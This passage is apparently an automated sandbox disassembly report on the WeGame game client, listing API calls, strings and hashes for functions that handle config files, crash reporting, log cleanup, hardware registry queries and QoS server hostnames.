                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@H_prolog3U?$char_traits@V?$allocator@V?$basic_string@$?get_log_instance@base@@D@2@@std@@Logger@1@Wegame$??_0path@filesystem@ierd_tgp@@?get_cfg_by_path@common@ierd_tgp@@?get_exe_path_ex@?is_static_detail_log@common@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@Application@common@ierd_tgp@@Count@util_multi_instance@ierd_tgp@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3_H_prolog3_catch_ProcessProcess@util_multi_instance@ierd_tgp@@U?$less@V012@V012@@V123@V12@V?$basic_ptree@Vpath@filesystem@3@_invalid_parameter_noinfo_noreturnmemmove
                                                                • String ID: !$is_crypt$level$log$log$sub_instance_$tcls/log
                                                                • API String ID: 3319094191-1757275872
                                                                • Opcode ID: 7c79e9eaf2037cfc48e3e319a7c6ed09e005b1c01fe953423af65cd3ad07b2ab
                                                                • Instruction ID: 10d7c95779795f8c20453facca36c4efdf3cecc591cb2f344c412f93a0e86e0c
                                                                • Opcode Fuzzy Hash: 7c79e9eaf2037cfc48e3e319a7c6ed09e005b1c01fe953423af65cd3ad07b2ab
                                                                • Instruction Fuzzy Hash: 22B19071C0128CEADB05EBA5CD95BDDBBB4AF14308F14409EE10577282EB781F48DBA6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDBD883
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • GetModuleHandleA.KERNEL32 ref: 6BDBD8DE
                                                                • GetProcAddress.KERNEL32(00000000), ref: 6BDBD8E5
                                                                • memset.VCRUNTIME140(?,00000000,00000040), ref: 6BDBD8FB
                                                                • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 6BDBD914
                                                                • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00000001,?), ref: 6BDBD95C
                                                                • RegQueryValueExA.KERNEL32(?,~MHz,00000000,00000000,00000000,?), ref: 6BDBD98B
                                                                • RegQueryValueExA.KERNEL32(?,~MHz,00000000,00000000,?,00000004), ref: 6BDBD9B5
                                                                • RegCloseKey.KERNEL32(00000000), ref: 6BDBD9C6
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 6BDBD9E3
                                                                • GetProcAddress.KERNEL32(00000000), ref: 6BDBD9EA
                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 6BDBD9FB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcQueryValue$CloseGlobalH_prolog3_InfoMemoryNativeOpenStatusSystemmemmovememset
                                                                • String ID: %d#%d#%d#%d$@$GetNativeSystemInfo$GlobalMemoryStatusEx$HARDWARE\DESCRIPTION\System\CentralProcessor\0$kernel32.dll$~MHz
                                                                • API String ID: 3699991175-3485845034
                                                                • Opcode ID: 88a1b43a5fc4b5ab0d261001de5ba3e3fe4edf2e2a871f588515b1b0b71d39cf
                                                                • Instruction ID: f79d6c39c473f4ddf15ed977869c2618d8ed96e00af6187d6c5d9cb98244f3ca
                                                                • Opcode Fuzzy Hash: 88a1b43a5fc4b5ab0d261001de5ba3e3fe4edf2e2a871f588515b1b0b71d39cf
                                                                • Instruction Fuzzy Hash: 074149B2900259EFEF249FA4CC84BD9B7B8BB04344F1044DAE609B7251DB799E858F30
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD49DF9
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000008,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?), ref: 6BD49E3C
                                                                • ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0), ref: 6BD49E50
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0,6BD47025), ref: 6BD49E6C
                                                                • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0), ref: 6BD49EDB
                                                                • ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?,?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?), ref: 6BD49EE8
                                                                • ?create_directory_ex@Sys_wrapper@common@ierd_tgp@@SA_NABVpath@filesystem@3@@Z.COMMON(?,?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?), ref: 6BD49EF6
                                                                • ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?), ref: 6BD49F05
                                                                • ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(00000000,?,?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000), ref: 6BD49F12
                                                                • ?backup_cfg_folder@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,00000000,?,?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?), ref: 6BD49F22
                                                                • ?copy_file@filesystem@ierd_tgp@@YAXABVpath@12@0@Z.COMMON(?,?), ref: 6BD49F77
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD49F7E
                                                                • ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?), ref: 6BD49FE8
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD4A017
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file_model.cpp, xrefs: 6BD49E90, 6BD49FA2, 6BD4A03B
                                                                • [cfg_mgr][cfg_file_model]copy file failer: %s, xrefs: 6BD4A05E
                                                                • [cfg_file_model]file copied: %s, xrefs: 6BD49FC5
                                                                • [cfg_mgr]file not exist: %s, xrefs: 6BD49EB3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?exists@filesystem@ierd_tgp@@?get_log_instance@base@@Logger@1@Vpath@12@@$H_prolog3_catch_U?$char_traits@_V123@V?$allocator@_V?$basic_string@_W@std@@$??0path@filesystem@ierd_tgp@@?backup_cfg_folder@?copy_file@filesystem@ierd_tgp@@?create_directory_ex@?filename@path@filesystem@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@File_info@common@ierd_tgp@@H_prolog3Sys_wrapper@common@ierd_tgp@@U?$char_traits@V?$allocator@V?$basic_string@Vpath@12@0@Vpath@filesystem@3@Vpath@filesystem@3@@W@2@@std@@W@2@@std@@@
                                                                • String ID: [cfg_file_model]file copied: %s$[cfg_mgr][cfg_file_model]copy file failer: %s$[cfg_mgr]file not exist: %s$e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file_model.cpp
                                                                • API String ID: 2517312394-3082331219
                                                                • Opcode ID: c8121eec776ffd85256707a1d7413fe8432437e7c171c400d690010ae3f199b8
                                                                • Instruction ID: 35920c3ea3b368d11b5bd4e1f5d8d18fb536d1f56056ac8bf7fd9f8a7442f3a9
                                                                • Opcode Fuzzy Hash: c8121eec776ffd85256707a1d7413fe8432437e7c171c400d690010ae3f199b8
                                                                • Instruction Fuzzy Hash: D1818E71805248EADF15DBF8C955BDDBBB49F21328F208098D0516F182EB799B09DBB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 0045F81A
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(CrashReportLoaderInit begin,0000007C,00459F30,00000000,?), ref: 0045F824
                                                                  • Part of subcall function 0045907A: __EH_prolog3.LIBCMT ref: 00459081
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,?,00000000,log,00000003,?,?,?,?,?,?,?,?,?,0000007C,00459F30), ref: 0045F86A
                                                                  • Part of subcall function 00459C66: __EH_prolog3.LIBCMT ref: 00459C6D
                                                                  • Part of subcall function 00469DFB: __EH_prolog3_GS.LIBCMT ref: 00469E02
                                                                  • Part of subcall function 00453D50: __EH_prolog3.LIBCMT ref: 00453D57
                                                                  • Part of subcall function 00453D50: ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001,?,?,?,?,00000008), ref: 00453D6E
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                • ?is_static_detail_log@common@ierd_tgp@@YA_NXZ.COMMON(?), ref: 0045F8EF
                                                                • ?GetLastLoginedWegameId@common@ierd_tgp@@YAIXZ.COMMON(?), ref: 0045F8FB
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045F920
                                                                • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON(?,?,?,?,00459F30,00000000,?), ref: 0045F92C
                                                                • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON(?,?,?,?,00459F30,00000000,?), ref: 0045F93D
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045F94F
                                                                • ?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ.ADAPT_FOR_IMPORTS ref: 0045F975
                                                                • ?Init@CrashReportLoader@crash_report@@QAEXPB_W_K1HP6GHPAUtagCrashReportHelperCallbackInfo@@@Z0@Z.ADAPT_FOR_IMPORTS(?,00000000,00000000,0000000A,00000004,00000000,0045EA47,?), ref: 0045F9A1
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(CrashReportLoaderInit end), ref: 0045F9AC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CrashD@std@@H_prolog3ReportU?$char_traits@V?$allocator@V?$basic_string@$?get_client_version_type@overseas@ierd_tgp@@?stamp_point@@D@2@@std@@Loader@crash_report@@SimpleString::operator=V12@$?get_cfg_by_path@common@ierd_tgp@@?is_static_detail_log@common@ierd_tgp@@CallbackD@2@@std@@@2@@property_tree@boost@@_H_prolog3_H_prolog3_catch_HelperId@common@ierd_tgp@@Info@@@Init@Init@locale@std@@Instance@LastLocimp@12@_LoginedU?$less@UtagV?$basic_ptree@Wegame_invalid_parameter_noinfo_noreturnmemmove
                                                                • String ID: CrashReportLoaderInit begin$CrashReportLoaderInit end$WeGame$WeGameX$level$log
                                                                • API String ID: 1061463012-1460748738
                                                                • Opcode ID: e7e4b55133e956e2d0b5acf0c269060ca2706953a3307e3c9ad17ebc2d0de39b
                                                                • Instruction ID: 743d4af21edeab1cd04db4995a91b2333f4ad39651bba051e6d5b3d752e51c79
                                                                • Opcode Fuzzy Hash: e7e4b55133e956e2d0b5acf0c269060ca2706953a3307e3c9ad17ebc2d0de39b
                                                                • Instruction Fuzzy Hash: 67416470D01248EBCF14EBEAC956BDDBBB4AF14318F60416EE10577192DB781B09CB5A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BDD35B8
                                                                • _Xtime_get_ticks.MSVCP140(0000022C), ref: 6BDD35DA
                                                                  • Part of subcall function 6BDD2789: __EH_prolog3_GS.LIBCMT ref: 6BDD2790
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,0000022C), ref: 6BDD361F
                                                                • ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BDD372F
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BDD387D
                                                                • DeleteFileW.KERNEL32(?,?,?,61C46800,00000008,?,?,?,00000000,00000000,00000000,?,?,?), ref: 6BDD3913
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BDD391D
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BDD3995
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000022C), ref: 6BDD3B07
                                                                • GetLastError.KERNEL32(00000000,00000003,e:\dailybuild_dev\wegame_client\codes\common\src\utility.cpp,00000030,6C02E7BF), ref: 6BDD395F
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                • DeleteFileW.KERNEL32(6C09A4FC,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BDD3B6A
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\utility.cpp, xrefs: 6BDD3640, 6BDD3946, 6BDD39B6, 6BDD3B28
                                                                • DeleteExpiredFiles delete log file[{}] success, xrefs: 6BDD39D1
                                                                • DeleteExpiredFiles check folder:{}, xrefs: 6BDD3658
                                                                • DeleteExpiredFiles delete log file[{}] failed:[{}], xrefs: 6BDD3976
                                                                • DeleteExpiredFiles DeleteFileW log file[{}], xrefs: 6BDD3B43
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$DeleteFile$??0path@filesystem@ierd_tgp@@ErrorH_prolog3H_prolog3_H_prolog3_catch_LastU?$char_traits@_Unothrow_t@std@@@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@Xtime_get_ticks__ehfuncinfo$??2@
                                                                • String ID: DeleteExpiredFiles DeleteFileW log file[{}]$DeleteExpiredFiles check folder:{}$DeleteExpiredFiles delete log file[{}] failed:[{}]$DeleteExpiredFiles delete log file[{}] success$e:\dailybuild_dev\wegame_client\codes\common\src\utility.cpp
                                                                • API String ID: 2732379511-4106189631
                                                                • Opcode ID: c7f3da7e4a0dbec188bc642e3ad76289aa77c64bc77547014b35b32e6554ddce
                                                                • Instruction ID: ca41cb1c9d25328a785f45896eab71ee1bd3c3010629f1ced487910264da453b
                                                                • Opcode Fuzzy Hash: c7f3da7e4a0dbec188bc642e3ad76289aa77c64bc77547014b35b32e6554ddce
                                                                • Instruction Fuzzy Hash: F2028B71D40258DACB25CF64C891BDDB7B4AF15324F2081D9D899BB280DB789F89CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD86760
                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000240,6BD8654E,00000000,?,?,?,?,?,00000010,?,000000FF,?), ref: 6BD867AA
                                                                • SetEndOfFile.KERNEL32(?), ref: 6BD867B6
                                                                • GetFileSize.KERNEL32(?,00000000), ref: 6BD867CB
                                                                • CreateFileA.KERNEL32(00000010,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 6BD867F7
                                                                • CloseHandle.KERNEL32(00000000), ref: 6BD86826
                                                                • memset.VCRUNTIME140(00000000,00000000,?), ref: 6BD86835
                                                                • __snprintf_s.LIBCMT ref: 6BD86868
                                                                  • Part of subcall function 6BD0A3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BD162D8,00000000,6BD16649,00000003,1F5A0D44,?,?,00000000,6BF764F4,000000FF,?,6BD15B05,00000000), ref: 6BD0A3E5
                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 6BD86BC4
                                                                • CloseHandle.KERNEL32(00000000), ref: 6BD86BD8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreateH_prolog3_PointerSizeWrite__snprintf_s_invalid_parameter_noinfo_noreturnmemset
                                                                • String ID: %02x$[Profile]$config1$config2$config3$config4$config5
                                                                • API String ID: 2584474234-2983988086
                                                                • Opcode ID: fe80ec67337f3c3521edb2800ce9414cc2a511095cc764a7e06cdd6d9bb610c0
                                                                • Instruction ID: 9ef133d47e016880d52deb620d589b981922b1f131da6e2a4c593fb8121f3132
                                                                • Opcode Fuzzy Hash: fe80ec67337f3c3521edb2800ce9414cc2a511095cc764a7e06cdd6d9bb610c0
                                                                • Instruction Fuzzy Hash: 6AD1AE71C05258EADB15DBB4CC89BDEBBB8AF15318F1040D9E009BB191DB785B88DBB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD926AB
                                                                • memset.VCRUNTIME140(?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002), ref: 6BD926C1
                                                                • memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?), ref: 6BD926D1
                                                                • memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5), ref: 6BD926DF
                                                                • memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745), ref: 6BD926ED
                                                                • memset.VCRUNTIME140(?,00000000,00000400,?,?), ref: 6BD92820
                                                                  • Part of subcall function 6BD104F0: __stdio_common_vsprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000020,?,6BD108F4,00000000,?,?,6BD108F4,?,00000020,%#.16g,?,00000010), ref: 6BD1050C
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD92889
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD928E4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$?get_log_instance@base@@Logger@1@$H_prolog3H_prolog3___stdio_common_vsprintf_s
                                                                • String ID: [qos_t]InitQos failed, {}$[qos_t]InitQos success$e:\dailybuild_dev\wegame_client\codes\common\src\qos_command.cpp$ied-tqos-tgp.qq.com$ied-tqos.qq.com$ied-tqos.wegamex.com.hk$ied-tqosweb.qq.com$ied-tqosweb.wegamex.com.hk$tqos.wegamex.com.hk
                                                                • API String ID: 2915109889-620687475
                                                                • Opcode ID: 8174dcfaa17f417db83344b4e21a6bdec4b51cfaaa0a5afcc710eefa1e0034af
                                                                • Instruction ID: f1da697d6f3f91e3146d9981c60f621b6d0d7525e56043cc507fd9d2cb29bed0
                                                                • Opcode Fuzzy Hash: 8174dcfaa17f417db83344b4e21a6bdec4b51cfaaa0a5afcc710eefa1e0034af
                                                                • Instruction Fuzzy Hash: 5A610AB1940219ABDB18EB749C85FEE77ACAF05368F004098A549AF191DF399F458BF0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD851D8
                                                                • _strnset_s.API-MS-WIN-CRT-STRING-L1-1-0(00000010,00000000,00000000,-00000001,00000144,6BD8624B,000000FF,?,00000105,00000000), ref: 6BD85225
                                                                • memset.VCRUNTIME140(?,00000000,00000105), ref: 6BD85238
                                                                • SHGetFolderPathA.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 6BD8524F
                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 6BD852DA
                                                                • GetLastError.KERNEL32 ref: 6BD852EA
                                                                • GetLastError.KERNEL32 ref: 6BD852F3
                                                                  • Part of subcall function 6BD152F9: __EH_prolog3.LIBCMT ref: 6BD15300
                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 6BD85356
                                                                • GetLastError.KERNEL32 ref: 6BD85360
                                                                • GetLastError.KERNEL32 ref: 6BD85369
                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 6BD853D1
                                                                • GetLastError.KERNEL32 ref: 6BD853E6
                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 6BD85414
                                                                • strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?), ref: 6BD85458
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$Create$DirectoryFile$FolderH_prolog3H_prolog3_Path_strnset_smemsetstrncpy_s
                                                                • String ID: \DeskUpdate$\GlobalMgr.db$\Tencent
                                                                • API String ID: 3246384263-3739784189
                                                                • Opcode ID: 9bea89be350ebbd1c66a0e914c9ec07e36e04524aa0ad9aed6459a8f8fe9294d
                                                                • Instruction ID: 9d2d045a31825fd620d1edcb553e22816c4a77d7891b4fcf4f0e8d50992ad626
                                                                • Opcode Fuzzy Hash: 9bea89be350ebbd1c66a0e914c9ec07e36e04524aa0ad9aed6459a8f8fe9294d
                                                                • Instruction Fuzzy Hash: BA71B171910228EBDB25DFA4CC95BDDB3B8BF09315F5005D9E20AAB190DB789B84CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000002,System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318},00000000,00020019,?,?,?,00000003), ref: 6BD84CB3
                                                                • __snprintf_s.LIBCMT ref: 6BD84CD1
                                                                • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 6BD84CF4
                                                                • RegQueryValueExA.KERNEL32(?,MediaSubType,00000000,?,?,00000104), ref: 6BD84D3B
                                                                • memset.VCRUNTIME140(?,00000000,00000104), ref: 6BD84D66
                                                                • RegQueryValueExA.ADVAPI32(?,PnpInstanceID,00000000,00000001,?,00000103), ref: 6BD84D90
                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(PCI), ref: 6BD84DA7
                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PCI,00000000,PCI), ref: 6BD84DBB
                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(PCI), ref: 6BD84DD8
                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PCI,00000000,PCI), ref: 6BD84DEA
                                                                • RegCloseKey.KERNEL32(?), ref: 6BD84E0D
                                                                • RegCloseKey.ADVAPI32(?), ref: 6BD84E15
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValuestrlenstrncmp$__snprintf_smemset
                                                                • String ID: %s\Connection$MediaSubType$PCI$PnpInstanceID$System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
                                                                • API String ID: 3706059900-3769660923
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045D9E2
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000007C,00459FD5), ref: 0045D9E9
                                                                • ?get_app_sub_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V45@@Z.COMMON(?,?,?,?,?,?,?,?,?,0000007C,00459FD5), ref: 0045DA6A
